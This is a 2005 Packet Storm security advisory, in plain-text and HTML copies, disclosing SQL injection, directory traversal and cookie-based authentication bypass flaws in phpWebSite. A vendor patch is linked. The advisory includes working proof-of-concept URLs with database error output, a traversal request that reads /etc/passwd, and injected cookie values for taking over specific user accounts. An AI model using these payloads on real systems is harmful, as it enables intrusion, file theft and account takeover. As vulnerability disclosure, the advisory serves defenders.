phpwebsiteSQL.txt

2005-07-07T00:00:00
ID PACKETSTORM:38513
Type packetstorm
Reporter Diabolic Crab
Modified 2005-07-07T00:00:00

Description

                                        
                                            `This is a multi-part message in MIME format.  
  
------=_NextPart_000_00D1_01C58264.72EAAD10  
Content-Type: text/plain;  
charset="iso-8859-1"  
Content-Transfer-Encoding: quoted-printable  
  
Dcrab 's Security Advisory  
http://www.dbtech.org  
Deadbolt Computer Technologies  
  
Get Dcrab's Services to audit your Web servers, scripts, networks, etc =  
or even code them. Learn more at http://www.dbtech.org  
  
Severity: High  
Title: Phpwebsite has multiple serious vulnerabilities  
Date: 7/07/2005  
  
Vendor: Phpwebsite  
Vendor Website: http://phpwebsite.appstate.edu  
Vendor Status: Contacted and patch has been released  
Summary: There are, multiple sql injection, authentication bypass and =  
directory transversal vulnerabilities in Phpwebsite.  
  
  
Proof of Concept Exploits:=20  
  
www.example.com/phpwebsite/index.php?module=3D'&search_op=3Dsearch&mod=3D=  
all&query=3D1&search=3DSearch=20  
SQL injection  
  
DB Error: syntax error  
SELECT show_block, block_title FROM mod_search WHERE module=3D''' =  
[nativecode=3D1064 ** You have an error in your SQL syntax. Check the =  
manual that corresponds to your MySQL server version for the right =  
syntax to use near ''''' at line 1]=20  
  
www.example.com/phpwebsite/index.php?module=3Dsearch&search_op=3Dsearch&m=  
od=3D'&query=3D1&search=3DSearch  
SQL injection  
  
DB Error: syntax error  
SELECT block_title FROM mod_search WHERE module=3D''' [nativecode=3D1064 =  
** You have an error in your SQL syntax. Check the manual that =  
corresponds to your MySQL server version for the right syntax to use =  
near ''''' at line 1]=20  
  
www.example.com/phpwebsite/index.php?module=3Dsearch&search_op=3Dsearch&m=  
od=3D../../../../../../../../etc/passwd%00&query=3D1&search=3DSearch  
Directory traversal  
  
root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/bin/bash =  
daemon:x:2:2:Daemon:/sbin:/bin/bash lp:x:4:7:Printing =  
daemon:/var/spool/lpd:/bin/bash mail:x:8:12:Mailer =  
daemon:/var/spool/clientmqueue:/bin/false news:x:9:13:News=20  
  
Log into a user account with remember me checked, then delete all the =  
cookies beside the one with [mod_users][rememberme]  
Cookie name: *an md5 hash set by the website* [mod_users][rememberme]  
Value: a' or 'a' =3D 'a  
You can also steal specific user accounts by setting the cookie value as =  
a' or user_id =3D '5'  
  
Solution:  
The vendor's were contacted via email and responded quickly. The issue =  
was corresponded to them after which a patch was released on their =  
official website.=20  
  
You can get the security patch at, =  
http://phpwebsite.appstate.edu/downloads/security/phpwebsite_security_pat=  
ch_20050705.2.tgz  
  
Keep your self updated, Rss feed at: http://digitalparadox.org/rss.ah =  
and at http://www.hackerscenter.com  
  
Author:=20  
These vulnerabilities have been found and released by Diabolic Crab, =  
Email: dcrab[AT|NOSPAM]hackerscenter[DOT|NOSPAM]com, please feel free to =  
contact me regarding these vulnerabilities. You can find me at, =  
http://www.hackerscenter.com or http://www.dbtech.org/. Lookout for my =  
soon to come out book on Secure coding with php.  
  
  
-------------------------------------------------------------------------=  
-------  
  
Sincerely,=20  
Diabolic Crab=20  
  
  
  
  
  
------=_NextPart_000_00D1_01C58264.72EAAD10  
Content-Type: text/html;  
charset="iso-8859-1"  
Content-Transfer-Encoding: quoted-printable  
  
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">  
<HTML><HEAD>  
<META http-equiv=3DContent-Type content=3D"text/html; =  
charset=3Diso-8859-1">  
<META content=3D"MSHTML 6.00.2900.2668" name=3DGENERATOR>  
<STYLE></STYLE>  
</HEAD>  
<BODY bgColor=3D#ffffff>  
<DIV>  
<DIV>  
<DIV><FONT face=3DArial size=3D2>Dcrab 's Security Advisory<BR><A=20  
href=3D"http://www.dbtech.org">http://www.dbtech.org</A><BR>Deadbolt =  
Computer=20  
Technologies</FONT></DIV>  
<DIV> </DIV>  
<DIV><FONT face=3DArial size=3D2>Get Dcrab's Services to audit your Web =  
servers,=20  
scripts, networks, etc or even code them. Learn more at <A=20  
href=3D"http://www.dbtech.org">http://www.dbtech.org</A></FONT></DIV>  
<DIV> </DIV>  
<DIV><FONT face=3DArial size=3D2>Severity: High<BR>Title: Phpwebsite has =  
multiple=20  
serious vulnerabilities<BR>Date: 7/07/2005</FONT></DIV>  
<DIV> </DIV>  
<DIV><FONT face=3DArial size=3D2>Vendor: Phpwebsite<BR>Vendor Website: =  
<A=20  
href=3D"http://phpwebsite.appstate.edu">http://phpwebsite.appstate.edu</A=  
><BR>Vendor=20  
Status: Contacted and patch has been released</FONT></DIV>  
<DIV><FONT face=3DArial size=3D2>Summary: There are, multiple sql =  
injection,=20  
authentication bypass and directory transversal vulnerabilities in=20  
Phpwebsite.</FONT></DIV>  
<DIV><FONT face=3DArial size=3D2></FONT> </DIV><FONT face=3DArial =  
size=3D2>  
<DIV><BR>Proof of Concept Exploits: </DIV>  
<DIV> </DIV>  
<DIV><A=20  
href=3D"http://www.example.com/phpwebsite/index.php?module=3D'&search=  
_op=3Dsearch&mod=3Dall&query=3D1&search=3DSearch">www.example=  
.com/phpwebsite/index.php?module=3D'&search_op=3Dsearch&mod=3Dall=  
&query=3D1&search=3DSearch</A>=20  
<BR>SQL injection</DIV>  
<DIV> </DIV>  
<DIV>DB Error: syntax error<BR>SELECT show_block, block_title FROM =  
mod_search=20  
WHERE module=3D''' [nativecode=3D1064 ** You have an error in your SQL =  
syntax. Check=20  
the manual that corresponds to your MySQL server version for the right =  
syntax to=20  
use near ''''' at line 1] </DIV>  
<DIV> </DIV>  
<DIV><A=20  
href=3D"http://www.example.com/phpwebsite/index.php?module=3Dsearch&s=  
earch_op=3Dsearch&mod=3D'&query=3D1&search=3DSearch">www.exam=  
ple.com/phpwebsite/index.php?module=3Dsearch&search_op=3Dsearch&m=  
od=3D'&query=3D1&search=3DSearch</A><BR>SQL=20  
injection</DIV>  
<DIV> </DIV>  
<DIV>DB Error: syntax error<BR>SELECT block_title FROM mod_search WHERE=20  
module=3D''' [nativecode=3D1064 ** You have an error in your SQL syntax. =  
Check the=20  
manual that corresponds to your MySQL server version for the right =  
syntax to use=20  
near ''''' at line 1] </DIV>  
<DIV> </DIV>  
<DIV><A=20  
href=3D"http://www.example.com/phpwebsite/index.php?module=3Dsearch&s=  
earch_op=3Dsearch&mod=3D../../../../../../../../etc/passwd%00&que=  
ry=3D1&search=3DSearch">www.example.com/phpwebsite/index.php?module=3D=  
search&search_op=3Dsearch&mod=3D../../../../../../../../etc/passw=  
d%00&query=3D1&search=3DSearch</A><BR>Directory=20  
traversal</DIV>  
<DIV> </DIV>  
<DIV>root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/bin/bash=20  
daemon:x:2:2:Daemon:/sbin:/bin/bash lp:x:4:7:Printing=20  
daemon:/var/spool/lpd:/bin/bash mail:x:8:12:Mailer=20  
daemon:/var/spool/clientmqueue:/bin/false <A=20  
href=3D"news:x:9:13:News">news:x:9:13:News</A> </DIV>  
<DIV> </DIV>  
<DIV>Log into a user account with remember me checked, then delete all =  
the=20  
cookies beside the one with [mod_users][rememberme]<BR>Cookie name: *an =  
md5 hash=20  
set by the website* [mod_users][rememberme]<BR>Value: a' or 'a' =3D =  
'a<BR>You can=20  
also steal specific user accounts by setting the cookie value as a' or =  
user_id =3D=20  
'5'</DIV>  
<DIV> </DIV>  
<DIV>Solution:</DIV>  
<DIV>The vendor's were contacted via email and responded quickly. The =  
issue was=20  
corresponded to them after which a patch was released on their official =  
website.=20  
</DIV>  
<DIV> </DIV>  
<DIV>You can get the security patch at, <A=20  
href=3D"http://phpwebsite.appstate.edu/downloads/security/phpwebsite_secu=  
rity_patch_20050705.2.tgz">http://phpwebsite.appstate.edu/downloads/secur=  
ity/phpwebsite_security_patch_20050705.2.tgz</A></DIV>  
<DIV> </DIV>  
<DIV>Keep your self updated, Rss feed at: <A=20  
href=3D"http://digitalparadox.org/rss.ah">http://digitalparadox.org/rss.a=  
h</A> and=20  
at <A =  
href=3D"http://www.hackerscenter.com">http://www.hackerscenter.com</A></D=  
IV>  
<DIV> </DIV>  
<DIV>Author: <BR>These vulnerabilities have been found and released by =  
Diabolic=20  
Crab, Email: dcrab[AT|NOSPAM]hackerscenter[DOT|NOSPAM]com, please feel =  
free to=20  
contact me regarding these vulnerabilities. You can find me at, <A=20  
href=3D"http://www.hackerscenter.com">http://www.hackerscenter.com</A> =  
or <A=20  
href=3D"http://www.dbtech.org/">http://www.dbtech.org/</A>. Lookout for =  
my soon to=20  
come out book on Secure coding with php.<BR></FONT></DIV>  
<DIV>  
<HR>  
<BR>Sincerely, <BR>Diabolic Crab=20  
<BR><BR><BR><BR><BR></DIV></DIV></DIV></BODY></HTML>  
  
------=_NextPart_000_00D1_01C58264.72EAAD10--  
`